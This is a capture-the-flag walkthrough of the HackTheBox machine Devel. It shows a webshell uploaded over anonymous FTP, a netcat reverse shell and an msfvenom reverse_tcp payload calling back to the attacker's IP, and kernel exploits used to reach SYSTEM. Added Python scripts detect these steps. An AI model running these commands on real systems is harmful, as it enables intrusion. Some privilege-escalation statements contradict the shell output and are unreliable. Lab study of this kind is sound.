A Devel Box Penetration Testing Exercise



Introduction


This exercise is based on the HackTheBox machine Devel, which starts with FTP and HTTP. I will use an anonymous FTP login to upload a webshell and get a shell on the machine, then use a Windows kernel vulnerability to get a SYSTEM shell. Finally, a few simple privilege escalation steps yield the root flag.

Information Gathering


First, Nmap is used to probe the machine's open ports and services; it finds FTP and HTTP open on ports 21 and 80 respectively. Banner grabbing gives us the FTP and HTTP versions. The nmap scan results are as follows:

nmap -sC -sV -oA intense 10.129.152.23
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-27 19:04 UTC
Nmap scan report for 10.129.152.23
Host is up (0.069s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM                aspnet_client
| 03-17-17  05:37PM                689 iisstart.htm
|_03-17-17  05:37PM                 184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.73 seconds
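From a defender's side, the two things to take from this scan are the anonymous FTP login with a visible directory listing and the TRACE method enabled on IIS. The following Python script is an added example written for this edit (it is not part of the original post or of any of the tools it uses): it parses nmap's normal output, as produced by -oN or the .nmap file of -oA, into per-port records with their NSE script results, and reports those two exposures. The sample input is constructed from the scan above.

```python
import re

# Sample input, constructed from the nmap normal-output report shown above
# (trimmed to the port table and script results) so the script runs offline.
SAMPLE_NMAP = """\
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM                aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# "21/tcp open  ftp     Microsoft ftpd" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "| ftp-anon: ..." or "|_http-title: ..." opens a new NSE script result;
# indented lines such as "|_  SYST: Windows_NT" are continuation output.
SCRIPT_RE = re.compile(r"^\|(?:_|\s)([a-z][a-z0-9-]*):\s*(.*)$")


def parse_nmap(text):
    """Parse nmap normal output into a list of port records.

    Each record: {"port", "proto", "state", "service", "version", "scripts"},
    where "scripts" maps an NSE script name to its output lines.
    """
    ports = []
    current = None  # name of the script whose output is being collected
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)), "proto": m.group(2),
                "state": m.group(3), "service": m.group(4),
                "version": m.group(5).strip(), "scripts": {},
            })
            current = None
            continue
        if not ports or not line.startswith("|"):
            continue  # header, "Service Info:", trailing summary, etc.
        scripts = ports[-1]["scripts"]
        m = SCRIPT_RE.match(line)
        if m:
            current = m.group(1)
            scripts[current] = [m.group(2)] if m.group(2) else []
        elif current is not None:
            scripts[current].append(line.lstrip("|_ ").rstrip())
    return ports


def findings(ports):
    """Return the exposure findings an administrator should act on."""
    issues = []
    for p in ports:
        scripts = p["scripts"]
        where = f"{p['port']}/{p['proto']}"
        anon = scripts.get("ftp-anon", [])
        if anon and anon[0].startswith("Anonymous FTP login allowed"):
            # Every line after the first is a directory entry nmap listed.
            issues.append(f"{where}: anonymous FTP login allowed, "
                          f"{len(anon) - 1} directory entries exposed")
        for line in scripts.get("http-methods", []):
            if line.startswith("Potentially risky methods:"):
                methods = line.split(":", 1)[1].split()
                issues.append(f"{where}: risky HTTP methods enabled: {', '.join(methods)}")
    return issues


if __name__ == "__main__":
    for issue in findings(parse_nmap(SAMPLE_NMAP)):
        print(issue)
```

The parser keys script output by the script name rather than by position, so the same findings() check works on a scan of any host where ftp-anon or http-methods ran; listing entries are counted rather than interpreted, since nmap only shows what the anonymous account can read, not what it can write.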

We can open the IP in a browser:


The page shows that the site is running on an IIS 7 server. We could brute-force the server's directories to enumerate them, but there is nothing interesting on this site, so we skip that step.


We can, however, see that the image on the site is served from "welcome.png". That is all the information HTTP gives us for now, so next we enumerate FTP.

Log in to FTP as the anonymous user.

ftp 10.129.152.23
Connected to 10.129.152.23.
220 Microsoft FTP Service
Name (10.129.118.104:root): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM                     aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete

After logging in to FTP we can see some uploaded files, including "welcome.png", which is the same file the website's image is served from. Now let's check welcome.png on the website.



We can see that the website's welcome.png was uploaded to the machine via FTP. This means we can trigger remote code execution on the machine by uploading a file.

First, we upload a test file to the machine to confirm that we can upload arbitrary files.

ftp 10.129.152.23
Connected to 10.129.152.23.
220 Microsoft FTP Service
Name (10.129.152.23:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put testh4x.txt
local: testh4x.txt remote: testh4x.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
32 bytes sent in 0.00 secs (1.0523 MB/s)

Exploitation (without Metasploit)


Once the test file has uploaded successfully, we upload a simple web shell to the machine and then visit <ip address>/cmd.aspx.

ftp 10.129.152.23
Connected to 10.129.152.23.
220 Microsoft FTP Service
Name (10.129.152.23:root): anonymous
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put cmd.aspx
local: cmd.aspx remote: cmd.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (31.2545 MB/s)
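Both the test upload and the webshell upload above are ordinary STOR commands by the anonymous account, and an FTP site whose root is also the web root records them in its W3C log. The following Python script is an added example written for this edit, not code from the original post: it reads an IIS FTP log, using whatever #Fields header the file carries, and flags writes that such a site should never see, grading a server-executable extension higher than a plain anonymous write and a completed transfer higher than a denied one. The log lines are constructed; the field list is the one I expect the IIS 7.5 FTP service to write, and the extension list is an assumption to be adjusted to the handlers your server actually maps.

```python
import os
from dataclasses import dataclass

# Constructed sample of an IIS 7.5 FTP site log in W3C format. The anonymous
# session mirrors the uploads shown in this post, followed by one denied
# upload (status 550) and one upload by an authenticated account.
SAMPLE_FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Date: 2021-05-28 12:30:00
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2021-05-28 12:30:02 10.10.14.61 - 10.129.152.23 21 USER anonymous 331 0 0 0a1b2c3d -
2021-05-28 12:30:03 10.10.14.61 anonymous 10.129.152.23 21 PASS *** 230 0 0 0a1b2c3d /
2021-05-28 12:30:10 10.10.14.61 anonymous 10.129.152.23 21 STOR testh4x.txt 226 0 0 0a1b2c3d /testh4x.txt
2021-05-28 12:31:40 10.10.14.61 anonymous 10.129.152.23 21 STOR cmd.aspx 226 0 0 0a1b2c3d /cmd.aspx
2021-05-28 12:35:00 10.10.14.61 anonymous 10.129.152.23 21 RETR welcome.png 226 0 0 0a1b2c3d /welcome.png
2021-05-28 12:40:00 10.10.14.61 anonymous 10.129.152.23 21 STOR h4xplo1t.aspx 226 0 0 0a1b2c3d /h4xplo1t.aspx
2021-05-28 12:41:00 10.10.14.61 anonymous 10.129.152.23 21 STOR test2.aspx 550 5 0 0a1b2c3d /test2.aspx
2021-05-28 12:50:00 10.0.0.5 webadmin 10.129.152.23 21 STOR iisstart.htm 226 0 0 9f8e7d6c /iisstart.htm
"""

# FTP commands that create or change content on the server.
WRITE_METHODS = {"STOR", "STOU", "APPE", "RNTO"}
# Extensions IIS hands to a script engine or loads as code (assumed, non-exhaustive).
WEB_EXEC_EXT = {".asp", ".aspx", ".ashx", ".asmx", ".svc", ".cshtml",
                ".config", ".exe", ".dll"}
ANON_USERS = {"anonymous", "ftp"}


@dataclass
class Alert:
    when: str
    client: str
    user: str
    method: str
    path: str
    status: str
    severity: str
    reason: str


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()  # W3C logs encode embedded spaces as '+'
        if len(values) == len(fields):
            yield dict(zip(fields, values))


def detect_uploads(text):
    """Flag writes that a web-root FTP site should never see from its clients."""
    alerts = []
    for rec in parse_w3c(text):
        method = rec["cs-method"].upper()
        if method not in WRITE_METHODS:
            continue
        path = rec["x-fullpath"]
        succeeded = rec["sc-status"].startswith("2")
        executable = os.path.splitext(path)[1].lower() in WEB_EXEC_EXT
        anonymous = rec["cs-username"].lower() in ANON_USERS
        if executable:
            # A script file in the web root is code execution for anyone who
            # can reach it over HTTP; even a denied attempt is worth a look.
            severity = "critical" if succeeded else "high"
            reason = "server-executable file written to web root"
        elif anonymous:
            severity = "medium" if succeeded else "low"
            reason = "anonymous client wrote to the site"
        else:
            continue
        alerts.append(Alert(f"{rec['date']} {rec['time']}", rec["c-ip"],
                            rec["cs-username"], method, path,
                            rec["sc-status"], severity, reason))
    return alerts


if __name__ == "__main__":
    for a in detect_uploads(SAMPLE_FTP_LOG):
        print(f"[{a.severity}] {a.when} {a.client} {a.user} {a.method} "
              f"{a.path} ({a.status}): {a.reason}")
```

The configuration fix is simpler than the detection: the anonymous account needs no write permission on the FTP site, and the FTP root should not be the web root. The check is still useful as a compensating control where an FTP drop folder is required.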

Visiting http://10.129.152.23/cmd.aspx, we get an input form.


Now we can run whoami to print the current user on the machine.


We can also run dir to list files, which tells us the directory paths on the target machine.



We can see that the current user is iis apppool\web. Next we use nc.exe to get a shell.

Create a directory named h4xploit, copy nc.exe into it, and then start the SMB server.

sudo python smbserver.py share h4xploit/
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Next, start an nc listener on the local machine to catch the shell.

nc -lnvp 443
Listening on 0.0.0.0 443

Then send the following command to the webshell.

\\10.10.14.61\share\nc.exe -e cmd.exe 10.10.14.61 443

With the command above, we get a shell.

Connection received on 10.129.152.23 49159
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
iis apppool\web

c:\windows\system32\inetsrv>cd ../../..

c:\>cd Users

c:\Users>cd babis
cd babis
Access is denied.

c:\Users>
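The shell above leaves a distinctive process-creation trail on the server: the IIS worker process (w3wp.exe) spawns cmd.exe under the application pool identity, the next process image is loaded from a UNC path on a remote share, and the command line carries nc's -e redirection. The following Python script is an added example written for this edit, not code from the original post or from Sysmon: it runs four such rules over constructed process-creation events in a reduced Sysmon Event ID 1 shape (image, parent image, command line, user are my field names) that replay this chain, with one benign interactive prompt that must not fire.

```python
import ntpath
import re

# Constructed process-creation events (Sysmon Event ID 1 style, reduced to the
# fields the rules need). Events 1-4 replay the chain this post describes:
# the IIS worker runs the webshell's command, which launches nc.exe straight
# from the attacker's SMB share, which spawns the cmd.exe that is sent back.
# Event 5 is a logged-on user opening a prompt and should not match.
NC_CMD = r"\\10.10.14.61\share\nc.exe -e cmd.exe 10.10.14.61 443"
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r'c:\windows\system32\inetsrv\w3wp.exe -ap "Web"',
     "user": r"IIS APPPOOL\Web"},
    {"id": 2, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "command_line": f'cmd.exe /c "{NC_CMD}"',
     "user": r"IIS APPPOOL\Web"},
    {"id": 3, "image": r"\\10.10.14.61\share\nc.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": NC_CMD,
     "user": r"IIS APPPOOL\Web"},
    {"id": 4, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"\\10.10.14.61\share\nc.exe",
     "command_line": "cmd.exe",
     "user": r"IIS APPPOOL\Web"},
    {"id": 5, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "cmd.exe",
     "user": r"DEVEL\babis"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
WEB_WORKERS = {"w3wp.exe"}
# nc / ncat style "-e <program>" redirection anywhere in a command line
NC_EXEC_RE = re.compile(r"\bn(?:c|cat|c64)(?:\.exe)?\b.*\s-e\s+\S+", re.I)


def base(path):
    # ntpath handles both drive paths and UNC paths on any host OS
    return ntpath.basename(path).lower()


def rule_worker_spawned_shell(ev):
    return base(ev["parent_image"]) in WEB_WORKERS and base(ev["image"]) in SHELLS


def rule_apppool_shell(ev):
    return ev["user"].upper().startswith("IIS APPPOOL\\") and base(ev["image"]) in SHELLS


def rule_unc_image(ev):
    # Executables should come from local disk, not straight off a remote share
    return ev["image"].startswith("\\\\")


def rule_nc_exec(ev):
    return NC_EXEC_RE.search(ev["command_line"]) is not None


RULES = [("web_worker_spawned_shell", rule_worker_spawned_shell),
         ("apppool_identity_shell", rule_apppool_shell),
         ("image_on_remote_share", rule_unc_image),
         ("nc_exec_redirect", rule_nc_exec)]


def evaluate(ev):
    """Names of the rules a single event matches, in RULES order."""
    return [name for name, rule in RULES if rule(ev)]


def triage(events):
    """Map event id -> matched rule names for every event that matched at all."""
    hits = {}
    for ev in events:
        tags = evaluate(ev)
        if tags:
            hits[ev["id"]] = tags
    return hits


if __name__ == "__main__":
    for event_id, tags in triage(SAMPLE_EVENTS).items():
        print(event_id, ", ".join(tags))
```

The first two rules fire on the webshell's very first command regardless of which tool it runs, so they are the ones to keep even if the nc-specific pattern is tuned away; an application pool identity has no business starting a shell at all.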

As you can see, access is denied, so we have to get a SYSTEM shell.

Next, we can use the Watson exploit suggester to see which privilege escalation vulnerabilities are exploitable on the machine.

Exploitation (with Metasploit)


We can generate a payload with msfvenom and then upload it via FTP.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.61 LPORT=4444 -f aspx > h4xplo1t.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2884 bytes

Upload the generated payload to the target machine.

ftp 10.129.152.23
Connected to 10.129.152.23.
220 Microsoft FTP Service
Name (10.129.152.23:root): anonymous
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put h4xplo1t.aspx
local: h4xplo1t.aspx remote: h4xplo1t.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2921 bytes sent in 0.00 secs (30.9520 MB/s)

Before visiting http://10.129.152.23/h4xplo1t.aspx, start a handler in Metasploit:

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set LHOST 10.10.14.61
LHOST => 10.10.14.61
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.61:4444

After visiting http://10.129.152.23/h4xplo1t.aspx, we get a shell in Metasploit.

[*] Meterpreter session 1 opened (10.10.14.61:4444 -> 10.129.152.23:49164) at 2021-05-28 12:41:14 +0000

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows

Next, use local_exploit_suggester to identify vulnerabilities that can give us a SYSTEM shell.

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.129.152.23 - Collecting local exploits for x86/windows…
[*] 10.129.152.23 - 37 exploit checks are being tried…
[+] 10.129.152.23 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.129.152.23 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.152.23 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.129.152.23 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.129.152.23 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.152.23 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.152.23 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.129.152.23 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.152.23 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.129.152.23 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.129.152.23 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.129.152.23 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.129.152.23 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

We choose exploit/windows/local/ms10_015_kitrap0d, which opens a new session with a SYSTEM shell.

msf6 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 2
SESSION => 2
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.61
LHOST => 10.10.14.61
msf6 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.61:4444
[*] Launching notepad to host the exploit…
[+] Process 3204 launched.
[*] Reflectively injecting the exploit DLL into 3204…
[*] Injecting exploit into 3204 …
[*] Exploit injected. Injecting payload into 3204…
[*] Payload injected. Executing exploit…
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.129.152.23
[*] Meterpreter session 3 opened (10.10.14.61:4444 -> 10.129.152.23:49165) at 2021-05-28 12:51:59 +0000

meterpreter > shell
Process 3484 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\system

c:\windows\system32\inetsrv>

But just as we saw in the previous exploitation section, without privilege escalation we have no access to the user and root flags.

Privilege Escalation


Use smbserver to get Watson.exe onto the target system and run it to see which privilege escalation vulnerabilities are exploitable.

c:\Windows\Microsoft.NET\Framework>\\10.10.14.61\share\Watson.exe
\\10.10.14.61\share\Watson.exe
 [*] OS Build number: 7600
 [*] CPU Address Width: 32
 [*] Process IntPtr Size: 4
 [*] Using Windows path: C:\WINDOWS\System32

 [*] Appears vulnerable to MS10-073
  [>] Description: Kernel-mode drivers load unspecified keyboard layers improperly, which result in arbitrary code execution in the kernel.
  [>] Exploit: https://www.exploit-db.com/exploits/36327/
  [>] Notes: None.

 [*] Appears vulnerable to MS10-092
  [>] Description: When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.
  [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms10_092_schelevator.rb
  [>] Notes: None.

 [*] Appears vulnerable to MS11-046
  [>] Description: The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input, which allows local users to elevate privileges.
  [>] Exploit: https://www.exploit-db.com/exploits/40564/
  [>] Notes: None.

 [*] Appears vulnerable to MS12-042
  [>] Description: An EoP exists due to the way the Windows User Mode Scheduler handles system requests, which can be exploited to execute arbitrary code in kernel mode.
  [>] Exploit: https://www.exploit-db.com/exploits/20861/
  [>] Notes: None.

 [*] Appears vulnerable to MS13-005
  [>] Description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation.
  [>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
  [>] Notes: None.

 [*] Finished. Found 5 vulns :)

Of the exploitable vulnerabilities listed above, we choose MS11-046, because it meets our needs and is available on WindowsExploits.

To get a SYSTEM shell we exploit MS11-046, a precompiled exe that spawns a SYSTEM shell from the current shell. Save the precompiled exe in the SMB share and run it from the current shell.

c:\Users>\\10.10.14.61\share\MS11-046.exe

c:\Windows\System32>whoami
whoami
nt authority\system

c:\Windows\System32>

We finally have a SYSTEM shell and can now read user.txt and root.txt.

User:

c:\>cd Users/babis/Desktop

c:\Users\babis\Desktop>type user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8

c:\Users\babis\Desktop>

Root:

c:\Users>cd Administrator/Desktop

c:\Users\Administrator\Desktop>type root.txt
e621a0b5041708797c4fc4728bc72b4b

c:\Users\Administrator\Desktop>


This article was first published on the WeChat public account SecTr安全团队 (SecTr Security Team) under the title 记一次Devel靶机渗透测试演练实例.
